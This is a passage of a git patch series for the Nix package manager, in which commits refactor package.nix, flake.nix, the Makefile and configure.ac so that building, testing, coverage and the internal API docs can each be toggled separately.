{}; + internal-api-docs = nixpkgsFor.x86_64-linux.native.callPackage ./package.nix { + doBuild = false; + doCheck = false; + doInstallCheck = false; + enableInternalAPIDocs = true; + }; # System tests. tests = import ./tests/nixos { inherit lib nixpkgs nixpkgsFor; } // { diff --git a/internal-api-docs.nix b/internal-api-docs.nix deleted file mode 100644 index ddd3fa891..000000000 --- a/internal-api-docs.nix +++ /dev/null @@ -1,24 +0,0 @@ -{ nix -, doxygen -}: - -nix.overrideAttrs (old: { - pname = "nix-internal-api-docs"; - - configureFlags = old.configureFlags ++ [ - "--enable-internal-api-docs" - ]; - nativeBuildInputs = old.nativeBuildInputs ++ [ - doxygen - ]; - - dontBuild = true; - doCheck = false; - - installTargets = [ "internal-api-html" ]; - - postInstall = '' - mkdir -p $out/nix-support - echo "doc internal-api-docs $out/share/doc/nix/internal-api/html" >> $out/nix-support/hydra-build-products - ''; -}) diff --git a/package.nix b/package.nix index c1a3b9455..39fee8472 100644 --- a/package.nix +++ b/package.nix @@ -1,6 +1,7 @@ { lib , callPackage , stdenv +, releaseTools , versionSuffix ? "" , officialRelease ? false , buildUnreleasedNotes ? false @@ -21,6 +22,7 @@ , git , gtest , jq +, doxygen , libarchive , libcpuid , libgit2 @@ -45,16 +47,35 @@ # faithfully reflects how the underlying configure + make build system # work. The top-level flake.nix will choose useful combinations. +, pname ? "nix" + +, doBuild ? true +, doCheck ? stdenv.buildPlatform.canExecute stdenv.hostPlatform +, doInstallCheck ? stdenv.buildPlatform.canExecute stdenv.hostPlatform + +, withCoverageChecks ? false + +# Whether to build the internal API docs, can be done separately from +# everything else. +, enableInternalAPIDocs ? false + # Whether to install unit tests. This is useful when cross compiling # since we cannot run them natively during the build, but can do so # later. , installUnitTests ? stdenv.hostPlatform != stdenv.buildPlatform + +, test-daemon ? null +, test-client ? null }: let version = lib.fileContents ./.version + versionSuffix; canRunInstalled = stdenv.buildPlatform.canExecute stdenv.hostPlatform; + attrs = { + inherit doBuild doCheck doInstallCheck; + }; + filesets = { baseFiles = fileset.fileFilter (f: f.name != ".gitignore") ./.; @@ -78,17 +99,30 @@ let (fileset.fileFilter (f: lib.strings.hasPrefix "nix-profile" f.name) ./scripts) ]; }; + + mkDerivation = + if withCoverageChecks + then releaseTools.coverageAnalysis + else stdenv.mkDerivation; in -stdenv.mkDerivation (finalAttrs: let +mkDerivation (finalAttrs: let + + inherit (finalAttrs) + doCheck + doInstallCheck + ; + + doBuild = !finalAttrs.dontBuild; # Either running the unit tests during the build, or installing them # to be run later, requiresthe unit tests to be built. - buildUnitTests = finalAttrs.doCheck || installUnitTests; + buildUnitTests = doCheck || installUnitTests; + + anySortOfTesting = buildUnitTests || doInstallCheck; in { - pname = "nix"; - inherit version; + inherit pname version; src = let @@ -96,9 +130,10 @@ in { in fileset.toSource { root = ./.; - fileset = fileset.intersect filesets.baseFiles (fileset.unions [ + fileset = fileset.intersect filesets.baseFiles (fileset.unions ([ filesets.configureFiles filesets.topLevelBuildFiles + ] ++ lib.optionals doBuild [ ./boehmgc-coroutine-sp-fallback.diff ./doc ./misc @@ -107,8 +142,9 @@ in { ./unit-test-data ./COPYING ./scripts/local.mk + ] ++ lib.optionals anySortOfTesting [ filesets.functionalTestFiles - ]); + ])); }; VERSION_SUFFIX = versionSuffix; @@ -159,7 +195,13 @@ in { }) ; - doCheck = stdenv.hostPlatform != stdenv.buildPlatform; + propagatedBuildInputs = [ + boehmgc + nlohmann_json + ]; + + dontBuild = !attrs.doBuild; + doCheck = attrs.doCheck; checkInputs = [ # see buildInputs. The configure script always wants its test libs @@ -169,11 +211,8 @@ in { git mercurial openssh - ]; - - propagatedBuildInputs = [ - boehmgc - nlohmann_json + ] ++ lib.optionals enableInternalAPIDocs [ + doxygen ]; disallowedReferences = [ boost ]; @@ -198,30 +237,41 @@ in { ''} ''; - configureFlags = - lib.optionals stdenv.isLinux [ - "--with-boost=${boost}/lib" - "--with-sandbox-shell=${sh}/bin/busybox" - ] - ++ lib.optional (stdenv.isLinux && !(stdenv.hostPlatform.isStatic && stdenv.system == "aarch64-linux")) - "LDFLAGS=-fuse-ld=gold" - ++ [ "--sysconfdir=/etc" ] + configureFlags = [ + "--sysconfdir=/etc" + (lib.enableFeature doBuild "build") + (lib.enableFeature anySortOfTesting "test") + (lib.enableFeature enableInternalAPIDocs "internal-api-docs") + (lib.enableFeature canRunInstalled "doc-gen") + (lib.enableFeature installUnitTests "install-unit-tests") + ] ++ lib.optionals installUnitTests [ + "--with-check-bin-dir=${builtins.placeholder "check"}/bin" + "--with-check-lib-dir=${builtins.placeholder "check"}/lib" + ] ++ lib.optionals stdenv.isLinux [ + "--with-boost=${boost}/lib" + "--with-sandbox-shell=${sh}/bin/busybox" + ] ++ lib.optional (stdenv.isLinux && !(stdenv.hostPlatform.isStatic && stdenv.system == "aarch64-linux")) + "LDFLAGS=-fuse-ld=gold" ++ lib.optional stdenv.hostPlatform.isStatic "--enable-embedded-sandbox-shell" - ++ lib.optional buildUnitTests "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include" - ++ lib.optionals installUnitTests [ - "--enable-install-unit-tests" - "--with-check-bin-dir=${builtins.placeholder "check"}/bin" - "--with-check-lib-dir=${builtins.placeholder "check"}/lib" - ] - ++ lib.optional (!canRunInstalled) "--disable-doc-gen"; + ++ lib.optional buildUnitTests "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include"; enableParallelBuilding = true; makeFlags = "profiledir=$(out)/etc/profile.d PRECOMPILE_HEADERS=1"; + installTargets = lib.optional doBuild "install" + ++ lib.optional enableInternalAPIDocs "internal-api-html"; + installFlags = "sysconfdir=$(out)/etc"; - postInstall = '' + # In this case we are probably just running tests, and so there isn't + # anything to install, we just make an empty directory to signify tests + # succeeded. + installPhase = if finalAttrs.installTargets != [] then null else '' + mkdir -p $out + ''; + + postInstall = lib.optionalString doBuild '' mkdir -p $doc/nix-support echo "doc manual $doc/share/doc/nix/manual" >> $doc/nix-support/hydra-build-products ${lib.optionalString stdenv.hostPlatform.isStatic '' @@ -238,19 +288,29 @@ in { $out/lib/libboost_regex.dylib \ $out/lib/libnixexpr.dylib ''} + '' + lib.optionalString enableInternalAPIDocs '' + mkdir -p $out/nix-support + echo "doc internal-api-docs $out/share/doc/nix/internal-api/html" >> $out/nix-support/hydra-build-products ''; - doInstallCheck = finalAttrs.doCheck; + doInstallCheck = attrs.doInstallCheck; + installCheckFlags = "sysconfdir=$(out)/etc"; installCheckTarget = "installcheck"; # work around buggy detection in stdenv + # Needed for tests if we are not doing a build, but testing existing + # built Nix. + preInstallCheck = lib.optionalString (! doBuild) '' + mkdir -p src/nix-channel + ''; + separateDebugInfo = !stdenv.hostPlatform.isStatic; strictDeps = true; hardeningDisable = lib.optional stdenv.hostPlatform.isStatic "pie"; - passthru ={ + passthru = { inherit filesets; perl-bindings = callPackage ./perl { @@ -258,6 +318,25 @@ in { }; }; - meta.platforms = lib.platforms.unix; - meta.mainProgram = "nix"; + meta = { + platforms = lib.platforms.unix; + mainProgram = "nix"; + broken = !(lib.all (a: a) [ + (installUnitTests -> doBuild) + (doCheck -> doBuild) + ]); + }; + +} // lib.optionalAttrs withCoverageChecks { + lcovFilter = [ "*/boost/*" "*-tab.*" ]; + + hardeningDisable = ["fortify"]; + + NIX_CFLAGS_COMPILE = "-DCOVERAGE=1"; + + dontInstall = false; +} // lib.optionalAttrs (test-daemon != null) { + NIX_DAEMON_PACKAGE = test-daemon; +} // lib.optionalAttrs (test-client != null) { + NIX_CLIENT_PACKAGE = test-client; }) diff --git a/test-nix-versions.nix b/test-nix-versions.nix index 15f6cd8d0..bda4621a1 100644 --- a/test-nix-versions.nix +++ b/test-nix-versions.nix @@ -6,45 +6,10 @@ }: stdenv.mkDerivation { - NIX_DAEMON_PACKAGE = daemon; - NIX_CLIENT_PACKAGE = client; name = "nix-tests" + lib.optionalString (lib.versionAtLeast daemon.version "2.4pre20211005" && lib.versionAtLeast client.version "2.4pre20211005") "-${client.version}-against-${daemon.version}"; - - inherit (client) - version - VERSION_SUFFIX - nativeBuildInputs - buildInputs - propagatedBuildInputs - ; - - src = fileset.toSource { - root = ./.; - fileset = with client.passthru.filesets; - fileset.intersect baseFiles (fileset.unions [ - configureFiles - topLevelBuildFiles - functionalTestFiles - ]); - }; - - configureFlags = client.configureFlags # otherwise configure fails - ++ [ "--disable-build" ]; - - dontBuild = true; - doInstallCheck = true; - - installPhase = '' - mkdir -p $out - ''; - - installCheckPhase = '' - mkdir -p src/nix-channel - make installcheck -j$NIX_BUILD_CORES -l$NIX_BUILD_CORES - ''; } From 3d47e024837a4340b1a0b6b6b8114e9e9e0c38a4 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 16:48:50 -0500 Subject: [PATCH 032/654] WIP --- flake.nix | 9 +++--- package.nix | 90 +++++++++++++++++++++++++++++++---------------------- 2 files changed, 56 insertions(+), 43 deletions(-) diff --git a/flake.nix b/flake.nix index 44ce2d306..85ea1d052 100644 --- a/flake.nix +++ b/flake.nix @@ -153,7 +153,7 @@ then "" else "pre${builtins.substring 0 8 (self.lastModifiedDate or self.lastModified or "19700101")}_${self.shortRev or "dirty"}"; - sh = final.busybox-sandbox-shell or (final.busybox.override { + default-busybox-sandbox-shell = final.busybox.override { useMusl = true; enableStatic = true; enableMinimal = true; @@ -175,7 +175,7 @@ CONFIG_ASH_PRINTF y CONFIG_ASH_TEST y ''; - }); + }; boehmgc = (final.boehmgc.override { enableLargeConfig = true; @@ -192,10 +192,10 @@ inherit boehmgc fileset - sh stdenv versionSuffix ; + busybox-sandbox-shell = final.busybox-sandbox-shell or default-busybox-sandbox-shell; boost = final.boost.override { enableIcu = false; }; libgit2 = final.libgit2.overrideAttrs (attrs: { src = libgit2; @@ -277,9 +277,8 @@ # API docs for Nix's unstable internal C++ interfaces. internal-api-docs = nixpkgsFor.x86_64-linux.native.callPackage ./package.nix { + inherit fileset; doBuild = false; - doCheck = false; - doInstallCheck = false; enableInternalAPIDocs = true; }; diff --git a/package.nix b/package.nix index 39fee8472..15fe52b07 100644 --- a/package.nix +++ b/package.nix @@ -36,11 +36,12 @@ , openssl , pkg-config , rapidcheck -, sh , sqlite , util-linux , xz +, busybox-sandbox-shell ? null + # Configuration Options # # This probably seems like too many degrees of freedom, but it @@ -50,11 +51,13 @@ , pname ? "nix" , doBuild ? true -, doCheck ? stdenv.buildPlatform.canExecute stdenv.hostPlatform -, doInstallCheck ? stdenv.buildPlatform.canExecute stdenv.hostPlatform +, doCheck ? __forDefaults.canRunInstalled +, doInstallCheck ? __forDefaults.canRunInstalled , withCoverageChecks ? false +# Whether to build the regular manual +, enableManual ? __forDefaults.canRunInstalled # Whether to build the internal API docs, can be done separately from # everything else. , enableInternalAPIDocs ? false @@ -62,16 +65,26 @@ # Whether to install unit tests. This is useful when cross compiling # since we cannot run them natively during the build, but can do so # later. -, installUnitTests ? stdenv.hostPlatform != stdenv.buildPlatform +, installUnitTests ? __forDefaults.canRunInstalled +# For running the functional tests against a pre-built Nix. Probably +# want to use in conjunction with `doBuild = false;`. , test-daemon ? null , test-client ? null -}: + +# Not a real argument, just the only way to approximate let-binding some +# stuff for argument defaults. +, __forDefaults ? { + canRunInstalled = doBuild && stdenv.buildPlatform.canExecute stdenv.hostPlatform; + } +} @ attrs0: let version = lib.fileContents ./.version + versionSuffix; - canRunInstalled = stdenv.buildPlatform.canExecute stdenv.hostPlatform; + # selected attributes with defaults, will be used to define some + # things which should instead be gotten via `finalAttrs` in order to + # work with overriding. attrs = { inherit doBuild doCheck doInstallCheck; }; @@ -149,7 +162,11 @@ in { VERSION_SUFFIX = versionSuffix; - outputs = [ "out" "dev" "doc" ] + outputs = [ "out" ] + ++ lib.optional doBuild "dev" + # If we are doing just build or just docs, the one thing will use + # "out". We only need additional outputs if we are doing both. + ++ lib.optional (doBuild && (enableManual || enableInternalAPIDocs)) "doc" ++ lib.optional installUnitTests "check"; nativeBuildInputs = [ @@ -164,10 +181,11 @@ in { pkg-config ] ++ lib.optional stdenv.hostPlatform.isLinux util-linux - # Official releases don't have rl-next, so we don't need to compile a changelog + # Official releases don't have rl-next, so we don't need to compile a + # changelog ++ lib.optional (!officialRelease && buildUnreleasedNotes) changelog-d; - buildInputs = [ + buildInputs = lib.optionals doBuild [ boost brotli bzip2 @@ -180,19 +198,14 @@ in { openssl sqlite xz - - # These could be checkInputs but the configure phase fails w/o them - gtest - rapidcheck - ] - ++ lib.optional stdenv.isLinux libseccomp - ++ lib.optional stdenv.hostPlatform.isx86_64 libcpuid - # There have been issues building these dependencies - ++ lib.optional (stdenv.hostPlatform == stdenv.buildPlatform && (stdenv.isLinux || stdenv.isDarwin)) - (aws-sdk-cpp.override { - apis = ["s3" "transfer"]; - customMemoryManagement = false; - }) + ] ++ lib.optional stdenv.isLinux libseccomp + ++ lib.optional stdenv.hostPlatform.isx86_64 libcpuid + # There have been issues building these dependencies + ++ lib.optional (stdenv.hostPlatform == stdenv.buildPlatform && (stdenv.isLinux || stdenv.isDarwin)) + (aws-sdk-cpp.override { + apis = ["s3" "transfer"]; + customMemoryManagement = false; + }) ; propagatedBuildInputs = [ @@ -204,7 +217,8 @@ in { doCheck = attrs.doCheck; checkInputs = [ - # see buildInputs. The configure script always wants its test libs + gtest + rapidcheck ]; nativeCheckInputs = [ @@ -242,17 +256,17 @@ in { (lib.enableFeature doBuild "build") (lib.enableFeature anySortOfTesting "test") (lib.enableFeature enableInternalAPIDocs "internal-api-docs") - (lib.enableFeature canRunInstalled "doc-gen") + (lib.enableFeature enableManual "doc-gen") (lib.enableFeature installUnitTests "install-unit-tests") ] ++ lib.optionals installUnitTests [ "--with-check-bin-dir=${builtins.placeholder "check"}/bin" "--with-check-lib-dir=${builtins.placeholder "check"}/lib" - ] ++ lib.optionals stdenv.isLinux [ + ] ++ lib.optionals (doBuild && stdenv.isLinux) [ "--with-boost=${boost}/lib" - "--with-sandbox-shell=${sh}/bin/busybox" - ] ++ lib.optional (stdenv.isLinux && !(stdenv.hostPlatform.isStatic && stdenv.system == "aarch64-linux")) + "--with-sandbox-shell=${busybox-sandbox-shell}/bin/busybox" + ] ++ lib.optional (doBuild && stdenv.isLinux && !(stdenv.hostPlatform.isStatic && stdenv.system == "aarch64-linux")) "LDFLAGS=-fuse-ld=gold" - ++ lib.optional stdenv.hostPlatform.isStatic "--enable-embedded-sandbox-shell" + ++ lib.optional (doBuild && stdenv.hostPlatform.isStatic) "--enable-embedded-sandbox-shell" ++ lib.optional buildUnitTests "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include"; enableParallelBuilding = true; @@ -271,14 +285,14 @@ in { mkdir -p $out ''; - postInstall = lib.optionalString doBuild '' - mkdir -p $doc/nix-support - echo "doc manual $doc/share/doc/nix/manual" >> $doc/nix-support/hydra-build-products - ${lib.optionalString stdenv.hostPlatform.isStatic '' + postInstall = lib.optionalString doBuild ( + '' + mkdir -p $doc/nix-support + echo "doc manual $doc/share/doc/nix/manual" >> $doc/nix-support/hydra-build-products + '' + lib.optionalString stdenv.hostPlatform.isStatic '' mkdir -p $out/nix-support echo "file binary-dist $out/bin/nix" >> $out/nix-support/hydra-build-products - ''} - ${lib.optionalString stdenv.isDarwin '' + '' + lib.optionalString stdenv.isDarwin '' install_name_tool \ -change ${boost}/lib/libboost_context.dylib \ $out/lib/libboost_context.dylib \ @@ -287,10 +301,10 @@ in { -change ${boost}/lib/libboost_regex.dylib \ $out/lib/libboost_regex.dylib \ $out/lib/libnixexpr.dylib - ''} - '' + lib.optionalString enableInternalAPIDocs '' - mkdir -p $out/nix-support - echo "doc internal-api-docs $out/share/doc/nix/internal-api/html" >> $out/nix-support/hydra-build-products + '' + ) + lib.optionalString enableInternalAPIDocs '' + mkdir -p ''${!outputDoc}/nix-support + echo "doc internal-api-docs $out/share/doc/nix/internal-api/html" >> ''${!outputDoc}/nix-support/hydra-build-products ''; doInstallCheck = attrs.doInstallCheck; From c71d987553530dcf02bcd7bf4c682634d7e5b6be Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 17:12:38 -0500 Subject: [PATCH 033/654] Fix incorrect flag name --- package.nix | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/package.nix b/package.nix index d2498ade2..f688cc819 100644 --- a/package.nix +++ b/package.nix @@ -254,7 +254,7 @@ in { configureFlags = [ "--sysconfdir=/etc" (lib.enableFeature doBuild "build") - (lib.enableFeature anySortOfTesting "test") + (lib.enableFeature anySortOfTesting "tests") (lib.enableFeature enableInternalAPIDocs "internal-api-docs") (lib.enableFeature enableManual "doc-gen") (lib.enableFeature installUnitTests "install-unit-tests") From 7b51086d736f8cf983744510ff40e5afbc313079 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:12:05 -0500 Subject: [PATCH 034/654] More fixes --- coverage.nix | 29 ---------------- flake.nix | 97 ++++++++++++++++++++++++++++++---------------------- package.nix | 61 +++++++++++++++++++++------------ 3 files changed, 95 insertions(+), 92 deletions(-) delete mode 100644 coverage.nix diff --git a/coverage.nix b/coverage.nix deleted file mode 100644 index 2c5e4a06d..000000000 --- a/coverage.nix +++ /dev/null @@ -1,29 +0,0 @@ -{ lib -, releaseTools -, nix -, stdenv -}: - -let - inherit (nix) version; - -in - -releaseTools.coverageAnalysis { - name = "nix-coverage-${version}"; - - inherit (nix) - src - buildInputs - nativeBuildInputs - propagatedBuildInputs - configureFlags - makeFlags - installFlags - doInstallCheck - installCheckFlags - installCheckTarget - ; - - enableParallelBuilding = true; -} diff --git a/flake.nix b/flake.nix index aafcfd71b..fab8c45be 100644 --- a/flake.nix +++ b/flake.nix @@ -123,8 +123,20 @@ ''; testNixVersions = pkgs: client: daemon: - pkgs.callPackage ./test-nix-versions.nix { - inherit client daemon fileset; + pkgs.callPackage ./package.nix { + pname = + "nix-tests" + + lib.optionalString + (lib.versionAtLeast daemon.version "2.4pre20211005" && + lib.versionAtLeast client.version "2.4pre20211005") + "-${client.version}-against-${daemon.version}"; + + inherit fileset; + + test-client = client; + test-daemon = daemon; + + doBuild = false; }; binaryTarball = nix: pkgs: pkgs.callPackage ./binary-tarball.nix { @@ -134,10 +146,6 @@ overlayFor = getStdenv: final: prev: let stdenv = getStdenv final; - - lowdown-nix = final.callPackage ./lowdown.nix { - inherit lowdown-src stdenv; - }; in { nixStable = prev.nix; @@ -145,6 +153,41 @@ # Forward from the previous stage as we don’t want it to pick the lowdown override inherit (prev) nixUnstable; + default-busybox-sandbox-shell = final.busybox.override { + useMusl = true; + enableStatic = true; + enableMinimal = true; + extraConfig = '' + CONFIG_FEATURE_FANCY_ECHO y + CONFIG_FEATURE_SH_MATH y + CONFIG_FEATURE_SH_MATH_64 y + + CONFIG_ASH y + CONFIG_ASH_OPTIMIZE_FOR_SIZE y + + CONFIG_ASH_ALIAS y + CONFIG_ASH_BASH_COMPAT y + CONFIG_ASH_CMDCMD y + CONFIG_ASH_ECHO y + CONFIG_ASH_GETOPTS y + CONFIG_ASH_INTERNAL_GLOB y + CONFIG_ASH_JOB_CONTROL y + CONFIG_ASH_PRINTF y + CONFIG_ASH_TEST y + ''; + }; + + lowdown-nix = final.callPackage ./lowdown.nix { + inherit lowdown-src stdenv; + }; + + libgit2-nix = final.libgit2.overrideAttrs (attrs: { + src = libgit2; + version = libgit2.lastModifiedDate; + cmakeFlags = attrs.cmakeFlags or [] + ++ [ "-DUSE_SSH=exec" ]; + }); + nix = let officialRelease = false; @@ -153,30 +196,6 @@ then "" else "pre${builtins.substring 0 8 (self.lastModifiedDate or self.lastModified or "19700101")}_${self.shortRev or "dirty"}"; - default-busybox-sandbox-shell = final.busybox.override { - useMusl = true; - enableStatic = true; - enableMinimal = true; - extraConfig = '' - CONFIG_FEATURE_FANCY_ECHO y - CONFIG_FEATURE_SH_MATH y - CONFIG_FEATURE_SH_MATH_64 y - - CONFIG_ASH y - CONFIG_ASH_OPTIMIZE_FOR_SIZE y - - CONFIG_ASH_ALIAS y - CONFIG_ASH_BASH_COMPAT y - CONFIG_ASH_CMDCMD y - CONFIG_ASH_ECHO y - CONFIG_ASH_GETOPTS y - CONFIG_ASH_INTERNAL_GLOB y - CONFIG_ASH_JOB_CONTROL y - CONFIG_ASH_PRINTF y - CONFIG_ASH_TEST y - ''; - }; - boehmgc = (final.boehmgc.override { enableLargeConfig = true; }).overrideAttrs(o: { @@ -195,18 +214,11 @@ stdenv versionSuffix ; - busybox-sandbox-shell = final.busybox-sandbox-shell or default-busybox-sandbox-shell; - libgit2 = final.libgit2.overrideAttrs (attrs: { - src = libgit2; - version = libgit2.lastModifiedDate; - cmakeFlags = attrs.cmakeFlags or [] - ++ [ "-DUSE_SSH=exec" ]; - }); - lowdown = lowdown-nix; officialRelease = false; + libgit2 = final.libgit2-nix; + lowdown = final.lowdown-nix; + busybox-sandbox-shell = final.busybox-sandbox-shell or final.default-busybox-sandbox-shell; }; - - inherit lowdown-nix; }; in { @@ -272,7 +284,10 @@ dockerImage = lib.genAttrs linux64BitSystems (system: self.packages.${system}.dockerImage); # Line coverage analysis. - coverage = nixpkgsFor.x86_64-linux.native.callPackage ./coverage.nix {}; + coverage = nixpkgsFor.x86_64-linux.native.nix.override { + pname = "nix-coverage"; + withCoverageChecks = true; + }; # API docs for Nix's unstable internal C++ interfaces. internal-api-docs = nixpkgsFor.x86_64-linux.native.callPackage ./package.nix { diff --git a/package.nix b/package.nix index f688cc819..0758f989e 100644 --- a/package.nix +++ b/package.nix @@ -2,9 +2,6 @@ , callPackage , stdenv , releaseTools -, versionSuffix ? "" -, officialRelease ? false -, buildUnreleasedNotes ? false , autoconf-archive , autoreconfHook , aws-sdk-cpp @@ -43,21 +40,25 @@ , busybox-sandbox-shell ? null # Configuration Options -# +#: # This probably seems like too many degrees of freedom, but it # faithfully reflects how the underlying configure + make build system # work. The top-level flake.nix will choose useful combinations. , pname ? "nix" +, versionSuffix ? "" +, officialRelease ? false + , doBuild ? true , doCheck ? __forDefaults.canRunInstalled -, doInstallCheck ? __forDefaults.canRunInstalled +, doInstallCheck ? test-client != null || __forDefaults.canRunInstalled , withCoverageChecks ? false # Whether to build the regular manual , enableManual ? __forDefaults.canRunInstalled +, buildUnreleasedNotes ? false # Whether to build the internal API docs, can be done separately from # everything else. , enableInternalAPIDocs ? false @@ -115,7 +116,11 @@ let mkDerivation = if withCoverageChecks - then releaseTools.coverageAnalysis + then + # TODO support `finalAttrs` args function in + # `releaseTools.coverageAnalysis`. + argsFun: + releaseTools.coverageAnalysis (let args = argsFun args; in args) else stdenv.mkDerivation; in @@ -146,6 +151,7 @@ in { fileset = fileset.intersect filesets.baseFiles (fileset.unions ([ filesets.configureFiles filesets.topLevelBuildFiles + ./doc/internal-api ] ++ lib.optionals doBuild [ ./boehmgc-coroutine-sp-fallback.diff ./doc @@ -170,20 +176,24 @@ in { ++ lib.optional installUnitTests "check"; nativeBuildInputs = [ - bison - flex - (lib.getBin lowdown) - jq # Also for custom mdBook preprocessor. - mdbook - mdbook-linkcheck autoconf-archive autoreconfHook pkg-config - ] - ++ lib.optional stdenv.hostPlatform.isLinux util-linux - # Official releases don't have rl-next, so we don't need to compile a - # changelog - ++ lib.optional (!officialRelease && buildUnreleasedNotes) changelog-d; + ] ++ lib.optionals doBuild [ + bison + flex + ] ++ lib.optionals enableManual [ + (lib.getBin lowdown) + mdbook + mdbook-linkcheck + ] ++ lib.optionals (doInstallCheck || enableManual) [ + jq # Also for custom mdBook preprocessor. + ] ++ lib.optional stdenv.hostPlatform.isLinux util-linux + # Official releases don't have rl-next, so we don't need to compile a + # changelog + ++ lib.optional (!officialRelease && buildUnreleasedNotes) changelog-d + ++ lib.optional enableInternalAPIDocs doxygen + ; buildInputs = lib.optionals doBuild [ boost @@ -225,13 +235,11 @@ in { git mercurial openssh - ] ++ lib.optionals enableInternalAPIDocs [ - doxygen ]; disallowedReferences = [ boost ]; - preConfigure = lib.optionalString (! stdenv.hostPlatform.isStatic) '' + preConfigure = lib.optionalString (doBuild && ! stdenv.hostPlatform.isStatic) '' # Copy libboost_context so we don't get all of Boost in our closure. # https://github.com/NixOS/nixpkgs/issues/45462 mkdir -p $out/lib @@ -307,7 +315,14 @@ in { doInstallCheck = attrs.doInstallCheck; installCheckFlags = "sysconfdir=$(out)/etc"; - installCheckTarget = "installcheck"; # work around buggy detection in stdenv + # work around buggy detection in stdenv + installCheckTarget = "installcheck"; + + # work around weird bug where it doesn't want to do anything + installCheckPhase = if (!doBuild && doInstallCheck) then '' + mkdir -p src/nix-channel + make installcheck -j$NIX_BUILD_CORES -l$NIX_BUILD_CORES + '' else null; # Needed for tests if we are not doing a build, but testing existing # built Nix. @@ -317,7 +332,9 @@ in { separateDebugInfo = !stdenv.hostPlatform.isStatic; - strictDeps = true; + # TODO `releaseTools.coverageAnalysis` in Nixpkgs needs to be updated + # to work with `strictDeps`. + strictDeps = !withCoverageChecks; hardeningDisable = lib.optional stdenv.hostPlatform.isStatic "pie"; From c160c6251566e758dd4d8fd409df3fa3b2f832b9 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:12:22 -0500 Subject: [PATCH 035/654] Fix underlying build system so `--disable-build` works better - Internal API docs once again work - configure skips checks for a bunch of things it doesn't need --- Makefile | 2 +- configure.ac | 50 ++++++++++++++++++++++++++++---------------------- 2 files changed, 29 insertions(+), 23 deletions(-) diff --git a/Makefile b/Makefile index eea297c89..0b2b408ca 100644 --- a/Makefile +++ b/Makefile @@ -61,7 +61,7 @@ include mk/lib.mk # by the library. Rules are not "lazy" like variables, unfortunately. ifeq ($(ENABLE_BUILD), yes) $(eval $(call include-sub-makefile, doc/manual/local.mk)) -$(eval $(call include-sub-makefile, doc/internal-api/local.mk)) endif +$(eval $(call include-sub-makefile, doc/internal-api/local.mk)) GLOBAL_CXXFLAGS += -g -Wall -include config.h -std=c++2a -I src diff --git a/configure.ac b/configure.ac index f8b937eb5..f9ad3c840 100644 --- a/configure.ac +++ b/configure.ac @@ -122,7 +122,6 @@ AC_PATH_PROG(flex, flex, false) AC_PATH_PROG(bison, bison, false) AC_PATH_PROG(dot, dot) AC_PATH_PROG(lsof, lsof, lsof) -NEED_PROG(jq, jq) AC_SUBST(coreutils, [$(dirname $(type -p cat))]) @@ -133,6 +132,30 @@ AC_ARG_WITH(store-dir, AS_HELP_STRING([--with-store-dir=PATH],[path of the Nix s AC_SUBST(storedir) +# Running the functional tests without building Nix is useful for testing +# different pre-built versions of Nix against each other. +AC_ARG_ENABLE(build, AS_HELP_STRING([--disable-build],[Do not build nix]), + ENABLE_BUILD=$enableval, ENABLE_BUILD=yes) +AC_SUBST(ENABLE_BUILD) + +# Building without tests is useful for bootstrapping with a smaller footprint +# or running the tests in a separate derivation. Otherwise, we do compile and +# run them. +AC_ARG_ENABLE(tests, AS_HELP_STRING([--disable-tests],[Do not build the tests]), + ENABLE_TESTS=$enableval, ENABLE_TESTS=yes) +AC_SUBST(ENABLE_TESTS) + +# Building without API docs is the default as Nix' C++ interfaces are internal and unstable. +AC_ARG_ENABLE(internal_api_docs, AS_HELP_STRING([--enable-internal-api-docs],[Build API docs for Nix's internal unstable C++ interfaces]), + internal_api_docs=$enableval, internal_api_docs=no) +AC_SUBST(internal_api_docs) + +AS_IF( + [test "$ENABLE_BUILD" == "yes" || test "$ENABLE_TEST" == "yes"], + [NEED_PROG(jq, jq)]) + +AS_IF([test "$ENABLE_BUILD" == "yes"],[ + # Look for boost, a required dependency. # Note that AX_BOOST_BASE only exports *CPP* BOOST_CPPFLAGS, no CXX flags, # and CPPFLAGS are not passed to the C++ compiler automatically. @@ -155,18 +178,6 @@ if test "x$GCC_ATOMIC_BUILTINS_NEED_LIBATOMIC" = xyes; then LDFLAGS="-latomic $LDFLAGS" fi -# Running the functional tests without building Nix is useful for testing -# different pre-built versions of Nix against each other. -AC_ARG_ENABLE(build, AS_HELP_STRING([--disable-build],[Do not build nix]), - ENABLE_BUILD=$enableval, ENABLE_BUILD=yes) -AC_SUBST(ENABLE_BUILD) -# Building without tests is useful for bootstrapping with a smaller footprint -# or running the tests in a separate derivation. Otherwise, we do compile and -# run them. -AC_ARG_ENABLE(tests, AS_HELP_STRING([--disable-tests],[Do not build the tests]), - ENABLE_TESTS=$enableval, ENABLE_TESTS=yes) -AC_SUBST(ENABLE_TESTS) - AC_ARG_ENABLE(install-unit-tests, AS_HELP_STRING([--enable-install-unit-tests],[Install the unit tests for running later (default no)]), INSTALL_UNIT_TESTS=$enableval, INSTALL_UNIT_TESTS=no) AC_SUBST(INSTALL_UNIT_TESTS) @@ -179,11 +190,6 @@ AC_ARG_WITH(check-lib-dir, AS_HELP_STRING([--with-check-lib-dir=PATH],[path to i checklibdir=$withval, checklibdir=$libdir) AC_SUBST(checklibdir) -# Building without API docs is the default as Nix' C++ interfaces are internal and unstable. -AC_ARG_ENABLE(internal_api_docs, AS_HELP_STRING([--enable-internal-api-docs],[Build API docs for Nix's internal unstable C++ interfaces]), - internal_api_docs=$enableval, internal_api_docs=no) -AC_SUBST(internal_api_docs) - # LTO is currently broken with clang for unknown reasons; ld segfaults in the llvm plugin AC_ARG_ENABLE(lto, AS_HELP_STRING([--enable-lto],[Enable LTO (only supported with GCC) [default=no]]), lto=$enableval, lto=no) @@ -310,8 +316,7 @@ if test "$gc" = yes; then AC_DEFINE(HAVE_BOEHMGC, 1, [Whether to use the Boehm garbage collector.]) fi - -if test "$ENABLE_TESTS" = yes; then +AS_IF([test "$ENABLE_TESTS" == "yes"],[ # Look for gtest. PKG_CHECK_MODULES([GTEST], [gtest_main]) @@ 